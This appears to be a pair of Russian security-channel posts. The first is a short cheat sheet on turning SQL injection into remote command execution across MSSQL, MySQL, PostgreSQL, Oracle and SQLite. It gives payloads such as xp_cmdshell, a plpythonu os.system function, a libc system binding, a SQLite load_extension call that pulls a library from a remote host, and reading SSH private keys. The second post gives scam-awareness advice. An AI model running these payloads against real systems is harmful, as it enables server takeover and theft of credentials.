SQLi to RCE

На самом деле тема исполнения команд по средствам SQL инъекций сотни раз подвергалась обсуждениям, но думаю стоит собрать это все в одном месте). Техники брались в основном из статейки на medium и поста Intigriti в твитере (советую поглядеть)

Исполниться можно в контекстах разных баз данных:
1. MSSQL 💻
2. MySQL 😗
3. PostgreSQL 💻
4. Oracle 🤪
5. SQLite 🤝 (не нашел emoji :))

MSSQL: наверно самая известная техника среди пентестеров (sqli to rce) - это способ исполнения в MSSQL базах данных с использованием хранимой процедуры xp_cmdshell. Конечно, должны присутствовать необходимые привилегии, чтобы ее включить, так как по дефолту она выключена. После этого можно выполнять команды:

EXEC xp_cmdshell 'dir c:\';

MySQL: в этой субд исполниться можно за счет определяемых пользователем функций (UDF). Правда для этого необходимо загрузить и зарегистрировать библиотеку или она должна быть загружена администратором, после чего можно вызывать функции из этой библиотеки. Например:

SELECT sys_eval('whoami');

PostgreSQL: В постгресе есть несколько возможных подходов.
1 - Возможность подгрузки расширений. Можно использовать расширение по типу plpythonu для исполнения python когда прямо из SQL.

-- create extension
CREATE EXTENSION IF NOT EXISTS plpythonu;

-- define the malicious function
CREATE OR REPLACE FUNCTION exec_cmd(cmd text) RETURNS void AS $$
import os
os.system(cmd)
$$ LANGUAGE plpythonu;

-- execute command
SELECT exec_cmd('whoami');

2 - Загрузка функции напримую из libc например

CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;
SELECT system('whoami');

3- Команда PROGRAM

ORACLE: так как oracle имеет встроенный Java движок это позволяет создавать разработчикам хранимые процедуры. Злоумышленники тоже могут этим воспользоваться для создания своей вредоносной процедуры(подробнее см. статью на медиуме)

SQLite: в sqlite можно также пойти через подгрузку расширений, но эта возможность должна быть явна включена:

UNION SELECT 1,load_extension('\\example.com\mal_extension.so', 'MainFuncCall')

или например с помощью load_file() прочитать закрытые ключи SSH (этот подход можно применять и в других бдшках)


Если вдруг чего то не хватает, подмечайте, обязательно добавлю !)

#SQLi #RCE

Как сэкономить себе полчаса жизни

Предновогодняя суета – весьма плодотворная пора для того, чтобы нажиться на спешке и невнимательности людей. А это значит, что настало время разобрать очередную мошенническую схему, чтобы вы и ваши близкие не потеряли свои кровно заработанные. Схема не новая, но о ней в канале я еще не говорил, поэтому погнали (или не погнали) 🤕

Пока писал этот пост, решил погуглить, "авось она уже где-то описана" и да, оказалось, что она не такая уж и свежая, но, судя по тому, что уже несколько человек вокруг меня с ней столкнулись, не менее актуальная. Почитать про то, как эту схему проворачивают, можно вот тут – ссылка. Думаю, что нет необходимости в том, чтобы переписывать в формате поста этот алгоритм – проще прочитать его по ссылке выше. Так что в этот раз обойдемся только советами и комментариями.

Во-первых, надеюсь вы понимаете, что суммы списания могут быть абсолютно разные, в том числе и дробные. И касаться эта схема может не только маркетплейсов, но и любых покупок/заказов/услуг в интернетах.

Во-вторых, принцип нулевого доверия должен сохраняться во всем – если вас перекидывает на какую-то универсальную и уже знакомую страницу авторизации или оплаты, то это не значит, что пора расслабиться и можно вводить туда все, что угодно. Всегда проверяйте сертификаты на сайтах, следите за странными надписями или искаженными элементами/картинками на них.

Ну вот и всё. Пересылаем близким и спокойно идем дальше закупаться новогодними подарками 😺

#Кибергигиена

🔒 Пакет Безопасности | 💬 Чат | ⚡ Другие каналы